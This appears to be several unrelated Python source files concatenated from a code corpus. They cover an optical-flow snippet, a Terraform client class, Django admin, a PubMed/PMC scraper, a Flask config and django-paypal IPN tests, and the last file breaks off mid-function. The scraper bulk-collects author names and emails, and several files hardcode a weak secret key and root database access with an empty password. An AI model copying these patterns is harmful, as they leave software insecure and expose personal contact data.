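# Hedged usage sketch: "sample.avi" and the "results" directory are placeholder
# names, and sensible alpha / num_iter values depend on the footage.
if __name__ == "__main__":
    estimator = HS_Estimate(alpha=1.0, num_iter=100, video_path="sample.avi")
    estimator.match_with_original()    # estimate flow between consecutive frames
    estimator.save_results("results")  # writes compensated frames, vectors and losses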
|
# -*- coding: utf-8 -*-
import io
import json
import yaml
import os
import glob
import datetime
import petname
from django import forms
import python_terraform
from pydot import graph_from_dot_data
from architect.manager.client import BaseClient
from celery.utils.log import get_logger
logger = get_logger(__name__)
relation_mapping = {
'tf_openstack_compute_instance_v2-tf_openstack_compute_keypair_v2': 'using_tf_key_pair',
'tf_openstack_networking_subnet_v2-tf_openstack_networking_network_v2': 'in_tf_net',
'tf_openstack_compute_floatingip_associate_v2-tf_openstack_networking_floatingip_v2': 'links_tf_floating_ip',
'tf_openstack_networking_floatingip_v2-tf_openstack_networking_router_interface_v2': 'links_tf_floating_ip',
'tf_openstack_networking_router_interface_v2-tf_openstack_networking_subnet_v2': 'in_tf_subnet',
'tf_openstack_networking_router_interface_v2-tf_openstack_networking_router_v2': 'links_tf_router',
'tf_openstack_compute_instance_v2-tf_openstack_networking_network_v2': 'in_tf_net',
'tf_openstack_compute_floatingip_associate_v2-tf_openstack_compute_instance_v2': 'links_tf_floating_instance',
'tf_openstack_compute_instance_v2-tf_openstack_compute_secgroup_v2': 'has_tf_security_group',
}
DEFAULT_RESOURCES = [
'tf_template',
'tf_state',
# 'tf_resource',
]
class TerraformClient(BaseClient):
def __init__(self, **kwargs):
super(TerraformClient, self).__init__(**kwargs)
def auth(self):
return True
def check_status(self):
if os.path.isdir(self.metadata['template_path']):
return True
else:
return False
def _clean_name(self, name):
return name.replace('"', '').replace('[root] ', '').strip()
def update_resources(self, resources=None):
if self.auth():
if resources is None:
resources = DEFAULT_RESOURCES
for resource in resources:
metadata = self.get_resource_metadata(resource)
self.process_resource_metadata(resource, metadata)
count = len(self.resources.get(resource, {}))
logger.info("Processed {} {} resources".format(count,
resource))
self.process_relation_metadata()
def get_resource_status(self, kind, metadata):
if not isinstance(metadata, dict):
return 'unknown'
if kind == 'tf_template':
if metadata.get('status', None) == True:
return 'active'
if metadata.get('status', None) == False:
return 'error'
elif kind == 'tf_state':
if metadata.get('states', [{'state': None}])[0].get('state', None) is None:
return 'build'
return 'active'
return 'unknown'
def get_resource_metadata(self, kind, uid=None):
logger.info("Getting {} resources".format(kind))
response = {}
if kind == 'tf_template':
path = self.metadata['template_path']
if uid is None:
templates = glob.glob('{}/*'.format(path))
else:
templates = ['{}/{}'.format(path, uid)]
for template in templates:
resource = []
variable = []
files = glob.glob('{}/*.tf'.format(template))
for filename in files:
with open(filename) as file_handler:
name = filename.replace('{}/'.format(template), '')
resource.append({
'name': name,
'items': file_handler.read(),
'format': 'hcl'
})
files = glob.glob('{}/*.tf.json'.format(template))
for filename in files:
with open(filename) as file_handler:
name = filename.replace('{}/'.format(template), '')
resource.append({
'name': name,
'items': json.loads(file_handler.read()),
'format': 'json'
})
files = glob.glob('{}/*.tfvars'.format(template))
for filename in files:
with open(filename) as file_handler:
name = filename.replace('{}/'.format(template), '')
variable.append({
'name': name,
'items': file_handler.read(),
'format': 'hcl'
})
files = glob.glob('{}/*.tfvars.json'.format(template))
for filename in files:
with open(filename) as file_handler:
name = filename.replace('{}/'.format(template), '')
variable.append({
'name': name,
'items': json.loads(file_handler.read()),
'format': 'json'
})
client = python_terraform.Terraform(
working_dir=template)
return_code, raw_data, stderr = client.init(
reconfigure=python_terraform.IsFlagged,
backend=False)
if stderr == '':
status = True
init = raw_data
else:
status = False
init = stderr
data = {
                    'init': init,
'status': status,
'resources': resource,
'variables': variable
}
response[template.replace('{}/'.format(path), '')] = data
elif kind == 'tf_state':
path = self.metadata['template_path']
if uid is None:
templates = glob.glob('{}/*'.format(path))
else:
templates = ['{}/{}'.format(path, uid)]
for template in templates:
state = {}
if os.path.isfile('{}/terraform.tfstate'.format(template)):
with open('{}/terraform.tfstate'.format(template)) as file_handler:
state['default'] = file_handler.read()
files = glob.glob('{}/terraform.tfstate.d/*/terraform.tfstate'.format(template))
for filename in files:
with open(filename) as file_handler:
name = filename.replace('{}/terraform.tfstate.d/'.format(template), '').replace('/terraform.tfstate', '')
state[name] = file_handler.read()
for name, content in state.items():
data = {
'state': json.loads(content),
'template': template.replace('{}/'.format(path), '')
}
response[name] = data
elif kind == 'tf_resource':
return_code, raw_data, stderr = self.client.graph(
no_color=python_terraform.IsFlagged)
graph = graph_from_dot_data(raw_data)[0]
#response = graph.obj_dict['subgraphs']['"root"'][0]['nodes']
return response
def process_resource_metadata(self, kind, metadata):
if kind == 'tf_template':
for resource_name, resource in metadata.items():
self._create_resource(resource_name,
resource_name,
'tf_template',
metadata=resource)
elif kind == 'tf_state':
resources = self.get_resources('tf_state')
for resource_name, resource in metadata.items():
if resource_name in resources:
current_states = resources[resource_name]['metadata']['states']
if current_states[-1]['serial'] != resource['state']['serial']:
                        current_states.append(resource['state'])
                        states = current_states
else:
states = current_states
self._create_resource(resource_name,
resource_name,
'tf_state',
metadata={
'states': states,
'template': resource['template']
})
else:
self._create_resource(resource_name,
resource_name,
'tf_state',
metadata={
'states': [resource['state']],
'template': resource['template']
})
elif kind == 'tf_resource':
nodes = {}
for node in metadata:
clean_node = 'tf_{}'.format(self._clean_name(node).split('.')[0])
if clean_node in self._schema['resource']:
nodes[self._clean_name(node)] = {
'id': self._clean_name(node),
'name': self._clean_name(node).split('.')[1],
'kind': 'tf_{}'.format(self._clean_name(node).split('.')[0]),
'metadata': {}
}
res = None
return_code, raw_data, stderr = self.client.show(
no_color=python_terraform.IsFlagged)
raw_data = raw_data.split('Outputs:')[0]
data_buffer = io.StringIO(raw_data)
for line in data_buffer.readlines():
if line.strip() == '':
pass
elif line.startswith(' '):
meta_key, meta_value = line.split(' = ')
res['metadata'][meta_key.strip()] = meta_value.strip()
else:
if res is not None:
nodes[res['id']]['metadata'] = res['metadata']
resource_id = line.replace(' (tainted', '') \
.replace(':', '').replace('(', '').replace(')', '').strip()
try:
resource_kind, resource_name = str(resource_id).split('.')
res = {
'id': resource_id,
'name': resource_name.strip(),
'kind': 'tf_{}'.format(resource_kind),
'metadata': {}
}
except Exception as exception:
logger.error(exception)
for node_name, node in nodes.items():
self._create_resource(node['id'], node['name'],
node['kind'], None,
metadata=node['metadata'])
def process_relation_metadata(self):
for resource_id, resource in self.resources.get('tf_state',
{}).items():
self._create_relation(
'uses_tf_template',
resource_id,
resource['metadata']['template'])
"""
return_code, raw_data, stderr = self.client.graph(
no_color=python_terraform.IsFlagged)
graph = graph_from_dot_data(raw_data)[0]
for edge in graph.obj_dict['subgraphs']['"root"'][0]['edges']:
source = self._clean_name(edge[0]).split('.')
target = self._clean_name(edge[1]).split('.')
if 'tf_{}'.format(source[0]) in self.resources and 'tf_{}'.format(target[0]) in self.resources:
self._create_relation(
relation_mapping['tf_{}-tf_{}'.format(source[0], target[0])],
'{}.{}'.format(source[0], source[1]),
'{}.{}'.format(target[0], target[1]))
"""
def get_resource_action_fields(self, resource, action):
fields = {}
if resource.kind == 'tf_template':
if action == 'create':
initial_name = '{}-{}'.format(resource.name.replace('_', '-'),
self.generate_name())
initial_variables = yaml.safe_dump(resource.metadata['variables'][0]['items'],
default_flow_style=False)
fields['name'] = forms.CharField(label='Template name',
initial=initial_name)
fields['variables'] = forms.CharField(label='Variables',
widget=forms.Textarea,
initial=initial_variables,
help_text="Use YAML/JSON syntax.")
return fields
def process_resource_action(self, resource, action, data):
if resource.kind == 'tf_template':
if action == 'create':
metadata = {
'name': data['name'],
'template_dir': '{}/{}'.format(self.metadata['template_path'],
resource.name),
'states': [{
'variables': yaml.safe_load(data['variables']),
'state': None,
'min_serial': 1,
'timestamp': datetime.datetime.now()
}],
}
self._create_resource(data['name'],
data['name'],
'tf_state',
metadata=metadata)
self._create_relation(
'uses_tf_template',
data['name'],
resource.uid)
self.save()
self.create_resource('tf_state', metadata)
def generate_name(self, separator='-', word_count=2):
return petname.Generate(int(word_count), separator)
def create_resource(self, kind, metadata):
logger.info("Creating {} resource".format(kind))
if kind == 'tf_state':
state_dir = "terraform.tfstate.d/{}".format(metadata['name'])
os.makedirs(os.path.join(metadata['template_dir'], state_dir))
with open(os.path.join(metadata['template_dir'], '.terraform', 'environment'), 'w') as file_handler:
file_handler.write(metadata['name'])
self.client = python_terraform.Terraform(
working_dir=metadata['template_dir'],
state="{}/terraform.tfstate".format(state_dir))
return_code, raw_data, stderr = self.client.apply(
no_color=python_terraform.IsFlagged,
auto_approve=True,
var=metadata['states'][0]['variables'])
if os.path.isfile('{}/terraform.tfstate'.format(os.path.join(metadata['template_dir'], state_dir))):
with open('{}/terraform.tfstate'.format(os.path.join(metadata['template_dir'], state_dir))) as file_handler:
metadata['states'][0]['state'] = json.loads(file_handler.read())
metadata['states'][0]['serial'] = metadata['states'][0]['state']['serial']
metadata['states'][0].pop('min_serial')
return_code, raw_data, stderr = self.client.cmd('output',
json=python_terraform.IsFlagged)
if return_code == 0:
metadata['states'][0]['output'] = json.loads(raw_data)
self._create_resource(metadata['name'],
metadata['name'],
'tf_state',
metadata=metadata)
self.save()
|
from django.contrib import admin
from .models import *
admin.site.register(User)
admin.site.register(Plan)
admin.site.register(Previous_Plans)
|
# coding: utf-8
# In[96]:
# get ids
# http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=pubmed&term=%s' % term_name
# http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=pubmed&term=cancer&retstart=3182080&retmax=100
# http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pmc&id=212403,4584127
from common import *
from lxml.etree import *
import lxml.etree
import math
import re
import pymysql
def esearch(term, retstart, retmax, db='pubmed'):
'''
    Query the given database for term and return the parsed XML.
    :param term: the search term
    :param retstart: start position
    :param retmax: number of records to return
    :param db: database, defaults to pubmed
    :return: xml root element
'''
term = urllib.parse.quote(term.encode('utf-8', 'replace'))
# urllib.parse.quote(url.encode('utf-8', 'replace'))
str_url = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=%s&term=%s&retstart=%d&retmax=%d' % (db, term, retstart, retmax)
request = urllib.request.Request(str_url)
xml = urllib.request.urlopen(request).read()
# xml = open_url(str_url, encode='utf-8')
root = lxml.etree.XML(xml)
return root
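# Hedged usage sketch (requires network access to the NCBI E-utilities; the
# query term is a placeholder): fetch the first ten PubMed ids for a term.
#
#   root = esearch('cancer', retstart=0, retmax=10)
#   print([node.text for node in root.xpath('IdList/Id')])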
def get_id(term, retstart, retmax, db='pubmed'):
'''
    Return the list of ids extracted from the search result.
    :param term: search term
    :param retstart:
    :param retmax:
    :param db:
    :return: list of id strings
'''
root = esearch(term, retstart, retmax, db)
id_list = root.xpath('IdList/Id')
ids = [id.text for id in id_list]
return ids
def get_id_count(term, db='pubmed'):
'''
    Get the number of articles matching the given term.
:param term:
:param db:
:return:
'''
root = esearch(term, 1, 1, db)
# print(root.tostring())
count = root.xpath('Count')[0].text
return count
def query_id(term, retmax=100, db='pubmed'):
'''
    Core function: page through all ids matching the term and store them in the database.
    :param term:
    :param retmax: number of ids returned per page
:param db:
:return:
'''
count = int(get_id_count(term, db=db))
if count > int(retmax):
id_list = []
for ii in range(math.ceil(count / retmax)):
try:
ids = get_id(term, ii * retmax, retmax, db=db)
print('/'.join([str(ii), str(math.ceil(count / retmax))]) )
for id in ids:
cu_mysql.execute('insert into pmc_id values(%s)', id)
con_mysql.commit()
except Exception as e:
print(e)
cu_mysql.execute('insert into error_pmc_id values(%s)', ii)
con_mysql.commit()
# id_list += ids
# return id_list
else:
id_list = get_id(term, 0, count, db=db)
for id in id_list:
            cu_mysql.execute('insert into pmc_id values(%s)', id)
        con_mysql.commit()
# try:
# html = open_url(url, headers=headers)
# process_html(html)
# con.commit()
# except Exception as e:
# con.rollback()
# cu.execute('INSERT INTO error_dxy VALUES(?, ?)', (iterm, page))
# con.commit()
def efetch(ids, db='pubmed'):
'''
    Fetch record details for a list of ids.
:param ids:
:param db:
:return:
'''
str_url = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=%s&id=%s' % (db, ids)
request = urllib.request.Request(str_url)
xml = urllib.request.urlopen(request).read()
root = lxml.etree.XML(xml)
return root
def process_pmc(term):
'''
    Process full-text article records from the PMC database.
:param term:
:return:
'''
root = efetch(term, db='pmc')
articles = root.xpath('//article')
    # process each article
for article in articles:
journal = article.xpath('.//journal-title')[0].text
# journal-id journal-id-type="nlm-journal-id"
        journal_nlm_id = None  # not every article carries an nlm-journal-id
        if article.xpath('.//journal-id[@journal-id-type="nlm-journal-id"]'):
            journal_nlm_id = article.xpath('.//journal-id[@journal-id-type="nlm-journal-id"]')[0].text
issn = article.xpath('.//issn')[0].text
print(issn)
title = article.xpath('.//article-title')[0].text
subject = article.xpath('.//subject')[0].text
pmid = article.xpath('.//article-id[@pub-id-type="pmid"]')[0].text
pmc_id = article.xpath('.//article-id[@pub-id-type="pmc"]')[0].text
doi = article.xpath('.//article-id[@pub-id-type="doi"]')[0].text
authors = article.xpath('.//contrib[@contrib-type="author"]')
year = article.xpath('.//pub-date//year')[0].text
        # article-level information
aff_list = article.xpath('.//aff[@id]')
aff_dict = {}
keywords = article.xpath('.//kwd-group//kwd')
keyword_list = [kw.text for kw in keywords]
keyword_join = ','.join(keyword_list)
# ariticl_info = [pmc_id, pmid, doi, journal,journal_nlm_id, issn, title, subject, year, keyword_join]
# print(ariticl_info)
cu_mysql.execute('insert into pmc_ariticle(pmc_id, pmid, doi, journal,journal_nlm_id, issn, title, subject, year, keyword_join) values(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)',
(pmc_id, pmid, doi, journal,journal_nlm_id, issn, title, subject, year, keyword_join))
con_mysql.commit()
for aff in aff_list:
aff_str = tostring(aff)
aff_str_tmp = re.compile(r'(?<=>)[\s\S]*(?=</aff>)').findall(aff_str.decode('utf-8'))
if aff_str_tmp:
aff_str = aff_str_tmp[0]
aff_id = aff.get('id')
aff_dict[aff_id] = aff_str
author_index = 0
for author in authors:
author_index += 1
surname = author.xpath('.//name//surname')[0].text
given_names = author.xpath('.//name//given-names')[0].text
# full_name = surname + given_names
email_tmp = author.xpath('.//email')
if email_tmp:
email = email_tmp[0].text
else:
email='NA'
            # is this a corresponding author?
# <xref ref-type="corresp" rid="CR1">*</xref>
# corres = author.xpath('.//x')
corresp = 0
xref_corresp = author.xpath(".//xref[@ref-type='corresp']") # [@lang='eng']
if xref_corresp:
corresp = 1
            # corresponding author's email
            # get the author's affiliation(s)
xref = author.xpath(".//xref[@ref-type='aff']")
for ii in range(len(xref)):
if(xref[ii].get('ref-type') == 'aff' ):
aff_name = aff_dict[xref[ii].get('rid')]
# print(aff_name)
cu_mysql.execute('insert into pmc_authors(pmc_id, author_index, surname, given_names, email, corresp, aff_name) values(%s, %s, %s, %s, %s, %s, %s)',
(pmc_id, author_index, surname, given_names, email, corresp, aff_name))
con_mysql.commit()
# print(pmc_id, author_index, surname, given_names, email, corresp, aff_name)
        # Corresponding authors and their emails: PMC uses two markup styles; the first is
#<contrib contrib-type="author">
# <name>
# <surname>Jiang</surname>
# <given-names>Liwen</given-names>
# </name>
# <xref ref-type="aff" rid="A1">a</xref>
# <xref ref-type="aff" rid="A3">c</xref>
# <xref ref-type="corresp" rid="CR1">*</xref>
# </contrib>
        # the other style
# <contrib id="A3" corresp="yes" contrib-type="author">
        # the block below handles the second style
corresp_authors = article.xpath('.//contrib[@corresp="yes"]')
for corresp_author in corresp_authors:
surname = corresp_author.xpath('.//surname')[0].text
given_names = corresp_author.xpath('.//given-names')[0].text
# corresp_name = surname + given_names
email_tmp = corresp_author.xpath('.//email')
if email_tmp:
email = email_tmp[0].text
else:
email='NA'
# pmc_id, surname, given_names, email
cu_mysql.execute('insert into pmc_author(pmc_id, surname, given_names, email) values(%s, %s, %s, %s)',
(pmc_id, surname, given_names, email))
con_mysql.commit()
def process_pubmed(term):
root = efetch(term, db='pubmed')
# In[97]:
con_mysql = pymysql.connect(host='localhost', user='root', passwd='', db='xiaobaifinder', charset='utf8')
cu_mysql = con_mysql.cursor()
process_pmc('4686145')
cu_mysql.close()
con_mysql.close()
# In[95]:
cu_mysql.close()
con_mysql.close()
# In[ ]:
# pmc term
def get_pmc_id():
con_mysql = pymysql.connect(host='localhost', user='root', passwd='', db='xiaobaifinder', charset='utf8')
cu_mysql = con_mysql.cursor()
cu_mysql.execute('create table if not exists pmc_id(pmc_id varchar(12))')
cu_mysql.execute('create table if not exists error_pmc_id(page int)')
con_mysql.commit()
# con = sqlite3.connect('pubmed.db')
# cu = con.cursor()
# # cu.execute('DROP TABLE IF EXISTS dxy')
# cu.execute('CREATE TABLE IF NOT EXISTS pmid (pmid varchar(12))')
# cu.execute('CREATE TABLE IF NOT EXISTS error_pmid(page int)')
# con.commit()
    # fetch the PMC ids
term = '(PRC[Affiliation] OR China[Affiliation]) AND ("2005/1/1"[PDat] : "2015/12/31"[PDat]) '
query_id(term, db = 'pmc')
    # fetch the PMC records
cu_mysql.close()
con_mysql.close()
# In[ ]:
def get_pubmed_id():
con_mysql = pymysql.connect(host='localhost', user='root', passwd='', db='xiaobaifinder', charset='utf8')
cu_mysql = con_mysql.cursor()
cu_mysql.execute('create table if not exists pubmed_id(pmc_id varchar(12))')
cu_mysql.execute('create table if not exists error_pubmed_id(page int)')
con_mysql.commit()
# con = sqlite3.connect('pubmed.db')
# cu = con.cursor()
# # cu.execute('DROP TABLE IF EXISTS dxy')
# cu.execute('CREATE TABLE IF NOT EXISTS pmid (pmid varchar(12))')
# cu.execute('CREATE TABLE IF NOT EXISTS error_pmid(page int)')
# con.commit()
    # fetch the PubMed ids
term = '(PRC[Affiliation] OR China[Affiliation]) AND ("2005/1/1"[PDat] : "2015/12/31"[PDat]) '
query_id(term)
cu_mysql.close()
con_mysql.close()
# In[90]:
# In[ ]:
|
#-*- coding=utf-8 -*-
import os
from datetime import timedelta
basedir = os.path.abspath(os.path.dirname(__file__))
import pymysql
SECRET_KEY = 'SSDFDSFDFD'
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://user:password@localhost/db'  # replace user, password and db with your own
SQLALCHEMY_TRACK_MODIFICATIONS = True
debug = True
MAIL_SERVER = 'smtp.qq.com'
MAIL_PORT = 587
MAIL_USE_TLS = True
MAIL_USERNAME = ''
MAIL_PASSWORD = ''
# PayJS credentials
PAYJS_ID=''
PAYJS_KEY=''
|
from __future__ import unicode_literals
import locale
import unittest
from datetime import datetime
from decimal import Decimal
from django.conf import settings
from django.test import TestCase
from django.test.utils import override_settings
from django.utils import timezone
from six import text_type
from six.moves.urllib.parse import urlencode
from paypal.standard.ipn.models import PayPalIPN
from paypal.standard.ipn.signals import invalid_ipn_received, valid_ipn_received
from paypal.standard.ipn.views import CONTENT_TYPE_ERROR
from paypal.standard.models import ST_PP_CANCELLED
# Parameters are all bytestrings, so we can construct a bytestring
# request the same way that Paypal does.
TEST_RECEIVER_EMAIL = b"seller@paypalsandbox.com"
CHARSET = "windows-1252"
IPN_POST_PARAMS = {
"protection_eligibility": b"Ineligible",
"last_name": b"User",
"txn_id": b"51403485VH153354B",
"receiver_email": TEST_RECEIVER_EMAIL,
"payment_status": b"Completed",
"payment_gross": b"10.00",
"tax": b"0.00",
"residence_country": b"US",
"invoice": b"0004",
"payer_status": b"verified",
"txn_type": b"express_checkout",
"handling_amount": b"0.00",
"payment_date": b"23:04:06 Feb 02, 2009 PST",
"first_name": b"J\xF6rg",
"item_name": b"",
"charset": CHARSET.encode('ascii'),
"custom": b"website_id=13&user_id=21",
"notify_version": b"2.6",
"transaction_subject": b"",
"test_ipn": b"1",
"item_number": b"",
"receiver_id": b"258DLEHY2BDK6",
"payer_id": b"BN5JZ2V7MLEV4",
"verify_sign": b"An5ns1Kso7MWUdW4ErQKJJJ4qi4-AqdZy6dD.sGO3sDhTf1wAbuO2IZ7",
"payment_fee": b"0.59",
"mc_fee": b"0.59",
"mc_currency": b"USD",
"shipping": b"0.00",
"payer_email": b"bishan_1233269544_per@gmail.com",
"payment_type": b"instant",
"mc_gross": b"10.00",
"quantity": b"1",
}
class ResetIPNSignalsMixin(object):
def setUp(self):
super(ResetIPNSignalsMixin, self).setUp()
self.valid_ipn_received_receivers = valid_ipn_received.receivers
self.invalid_ipn_received_receivers = invalid_ipn_received.receivers
valid_ipn_received.receivers = []
invalid_ipn_received.receivers = []
def tearDown(self):
valid_ipn_received.receivers = self.valid_ipn_received_receivers
invalid_ipn_received.receivers = self.invalid_ipn_received_receivers
super(ResetIPNSignalsMixin, self).tearDown()
class IPNUtilsMixin(ResetIPNSignalsMixin):
def paypal_post(self, params):
"""
Does an HTTP POST the way that PayPal does, using the params given.
"""
# We build params into a bytestring ourselves, to avoid some encoding
# processing that is done by the test client.
cond_encode = lambda v: v.encode(CHARSET) if isinstance(v, text_type) else v
byte_params = {cond_encode(k): cond_encode(v) for k, v in params.items()}
post_data = urlencode(byte_params)
return self.client.post("/ipn/", post_data, content_type='application/x-www-form-urlencoded')
def assertGotSignal(self, signal, flagged, params=IPN_POST_PARAMS):
# Check the signal was sent. These get lost if they don't reference self.
self.got_signal = False
self.signal_obj = None
def handle_signal(sender, **kwargs):
self.got_signal = True
self.signal_obj = sender
signal.connect(handle_signal)
response = self.paypal_post(params)
self.assertEqual(response.status_code, 200)
ipns = PayPalIPN.objects.all()
self.assertEqual(len(ipns), 1)
ipn_obj = ipns[0]
self.assertEqual(ipn_obj.flag, flagged)
self.assertTrue(self.got_signal)
self.assertEqual(self.signal_obj, ipn_obj)
return ipn_obj
def assertFlagged(self, updates, flag_info):
params = IPN_POST_PARAMS.copy()
params.update(updates)
response = self.paypal_post(params)
self.assertEqual(response.status_code, 200)
ipn_obj = PayPalIPN.objects.all()[0]
self.assertEqual(ipn_obj.flag, True)
self.assertEqual(ipn_obj.flag_info, flag_info)
return ipn_obj
class MockedPostbackMixin(object):
def setUp(self):
super(MockedPostbackMixin, self).setUp()
# Monkey patch over PayPalIPN to make it get a VERFIED response.
self.old_postback = PayPalIPN._postback
PayPalIPN._postback = lambda self: b"VERIFIED"
def tearDown(self):
PayPalIPN._postback = self.old_postback
super(MockedPostbackMixin, self).tearDown()
@override_settings(ROOT_URLCONF='paypal.standard.ipn.tests.test_urls')
class IPNTest(MockedPostbackMixin, IPNUtilsMixin, TestCase):
def test_valid_ipn_received(self):
ipn_obj = self.assertGotSignal(valid_ipn_received, False)
# Check some encoding issues:
self.assertEqual(ipn_obj.first_name, u"J\u00f6rg")
# Check date parsing
self.assertEqual(ipn_obj.payment_date,
datetime(2009, 2, 3, 7, 4, 6,
tzinfo=timezone.utc if settings.USE_TZ else None))
def test_invalid_ipn_received(self):
PayPalIPN._postback = lambda self: b"INVALID"
self.assertGotSignal(invalid_ipn_received, True)
def test_reverify_ipn(self):
PayPalIPN._postback = lambda self: b"Internal Server Error"
self.paypal_post(IPN_POST_PARAMS)
ipn_obj = PayPalIPN.objects.all()[0]
self.assertEqual(ipn_obj.flag, True)
PayPalIPN._postback = lambda self: b"VERIFIED"
ipn_obj.verify()
self.assertEqual(ipn_obj.flag, False)
self.assertEqual(ipn_obj.flag_info, "")
self.assertEqual(ipn_obj.flag_code, "")
def test_invalid_payment_status(self):
update = {"payment_status": "Failure"}
flag_info = u"Invalid payment_status. (Failure)"
self.assertFlagged(update, flag_info)
    def test_valid_payment_status_cancelled(self):
update = {"payment_status": ST_PP_CANCELLED}
params = IPN_POST_PARAMS.copy()
params.update(update)
response = self.paypal_post(params)
self.assertEqual(response.status_code, 200)
ipn_obj = PayPalIPN.objects.all()[0]
self.assertEqual(ipn_obj.flag, False)
def test_duplicate_txn_id(self):
self.paypal_post(IPN_POST_PARAMS)
self.paypal_post(IPN_POST_PARAMS)
self.assertEqual(len(PayPalIPN.objects.all()), 2)
ipn_obj = PayPalIPN.objects.order_by('-created_at', '-pk')[0]
self.assertEqual(ipn_obj.flag, True)
self.assertEqual(ipn_obj.flag_info, "Duplicate txn_id. (51403485VH153354B)")
def test_duplicate_txn_id_with_first_flagged(self):
PayPalIPN._postback = lambda self: b"Internal Server Error"
self.paypal_post(IPN_POST_PARAMS)
PayPalIPN._postback = lambda self: b"VERIFIED"
self.paypal_post(IPN_POST_PARAMS)
self.assertEqual(len(PayPalIPN.objects.all()), 2)
ipn_objs = PayPalIPN.objects.order_by('created_at', 'pk')
self.assertEqual(ipn_objs[0].flag, True)
self.assertEqual(ipn_objs[1].flag, False)
def test_posted_params_attribute(self):
params = {'btn_id1': b"3453595",
'business': b"email-facilitator@gmail.com",
'charset': b"windows-1252",
'custom': b"blahblah",
"first_name": b"J\xF6rg",
'ipn_track_id': b"a48170aadb705",
'item_name1': b"Romanescoins",
'item_number1': b"",
'last_name': b"LASTNAME",
'mc_currency': b"EUR",
'mc_fee': b"0.35",
'mc_gross': b"3.00",
'mc_gross_1': b"3.00",
'mc_handling': b"0.00",
'mc_handling1': b"0.00",
'mc_shipping': b"0.00",
'mc_shipping1': b"0.00",
'notify_version': b"3.8",
'num_cart_items': b"1",
'payer_email': b"email@gmail.com",
'payer_id': b"6EQ6SKDFMPU36",
'payer_status': b"verified",
'payment_date': b"03:06:57 Jun 27, 2014 PDT",
'payment_fee': b"",
'payment_gross': b"",
'payment_status': b"Completed",
'payment_type': b"instant",
'protection_eligibility': b"Ineligible",
'quantity1': b"3",
'receiver_email': b"email-facilitator@gmail.com",
'receiver_id': b"UCWM6R2TARF36",
'residence_country': b"FR",
'tax': b"0.00",
'tax1': b"0.00",
'test_ipn': b"1",
'transaction_subject': b"blahblah",
'txn_id': b"KW31266C37C2593K4",
'txn_type': b"cart",
'verify_sign': b"A_SECRET_CODE"}
self.paypal_post(params)
ipn = PayPalIPN.objects.get()
self.assertEqual(ipn.posted_data_dict['quantity1'], '3')
self.assertEqual(ipn.posted_data_dict['first_name'], u"J\u00f6rg")
def test_paypal_date_format(self):
update = {
"next_payment_date": b"23:04:06 Feb 02, 2009 PST",
"subscr_date": b"23:04:06 Jan 02, 2009 PST",
"subscr_effective": b"23:04:06 Jan 02, 2009 PST",
"auction_closing_date": b"23:04:06 Jan 02, 2009 PST",
"retry_at": b"23:04:06 Jan 02, 2009 PST",
# test parsing times in PST/PDT change period
"case_creation_date": b"01:13:05 Nov 01, 2015 PST",
"time_created": b"01:13:05 Nov 01, 2015 PDT",
}
params = IPN_POST_PARAMS.copy()
params.update(update)
self.paypal_post(params)
self.assertFalse(PayPalIPN.objects.get().flag)
def test_paypal_date_invalid_format(self):
params = IPN_POST_PARAMS.copy()
params.update({"time_created": b"2015-10-25 01:21:32"})
self.paypal_post(params)
self.assertTrue(PayPalIPN.objects.latest('id').flag)
self.assertIn(
PayPalIPN.objects.latest('id').flag_info,
['Invalid form. (time_created: Invalid date format '
'2015-10-25 01:21:32: need more than 2 values to unpack)',
'Invalid form. (time_created: Invalid date format '
'2015-10-25 01:21:32: not enough values to unpack '
'(expected 5, got 2))'
]
)
# day not int convertible
params = IPN_POST_PARAMS.copy()
params.update({"payment_date": b"01:21:32 Jan 25th 2015 PDT"})
self.paypal_post(params)
self.assertTrue(PayPalIPN.objects.latest('id').flag)
self.assertEqual(
PayPalIPN.objects.latest('id').flag_info,
"Invalid form. (payment_date: Invalid date format "
"01:21:32 Jan 25th 2015 PDT: invalid literal for int() with "
"base 10: '25th')"
)
# month not in Mmm format
params = IPN_POST_PARAMS.copy()
params.update({"next_payment_date": b"01:21:32 01 25 2015 PDT"})
self.paypal_post(params)
self.assertTrue(PayPalIPN.objects.latest('id').flag)
self.assertIn(
PayPalIPN.objects.latest('id').flag_info,
["Invalid form. (next_payment_date: Invalid date format "
"01:21:32 01 25 2015 PDT: u'01' is not in list)",
"Invalid form. (next_payment_date: Invalid date format "
"01:21:32 01 25 2015 PDT: '01' is not in list)"]
)
# month not in Mmm format
params = IPN_POST_PARAMS.copy()
params.update({"retry_at": b"01:21:32 January 25 2015 PDT"})
self.paypal_post(params)
self.assertTrue(PayPalIPN.objects.latest('id').flag)
self.assertIn(
PayPalIPN.objects.latest('id').flag_info,
["Invalid form. (retry_at: Invalid date format "
"01:21:32 January 25 2015 PDT: u'January' is not in list)",
"Invalid form. (retry_at: Invalid date format "
"01:21:32 January 25 2015 PDT: 'January' is not in list)"]
)
# no seconds in time part
params = IPN_POST_PARAMS.copy()
params.update({"subscr_date": b"01:28 Jan 25 2015 PDT"})
self.paypal_post(params)
self.assertTrue(PayPalIPN.objects.latest('id').flag)
self.assertIn(
PayPalIPN.objects.latest('id').flag_info,
["Invalid form. (subscr_date: Invalid date format "
"01:28 Jan 25 2015 PDT: need more than 2 values to unpack)",
"Invalid form. (subscr_date: Invalid date format "
"01:28 Jan 25 2015 PDT: not enough values to unpack "
"(expected 3, got 2))"]
)
# string not valid datetime
params = IPN_POST_PARAMS.copy()
params.update({"case_creation_date": b"01:21:32 Jan 49 2015 PDT"})
self.paypal_post(params)
self.assertTrue(PayPalIPN.objects.latest('id').flag)
self.assertEqual(
PayPalIPN.objects.latest('id').flag_info,
"Invalid form. (case_creation_date: Invalid date format "
"01:21:32 Jan 49 2015 PDT: day is out of range for month)"
)
def test_content_type_validation(self):
with self.assertRaises(AssertionError) as assert_context:
self.client.post("/ipn/", {}, content_type='application/json')
        self.assertIn(CONTENT_TYPE_ERROR, repr(assert_context.exception))
self.assertFalse(PayPalIPN.objects.exists())
@override_settings(ROOT_URLCONF='paypal.standard.ipn.tests.test_urls')
class IPNLocaleTest(IPNUtilsMixin, MockedPostbackMixin, TestCase):
def setUp(self):
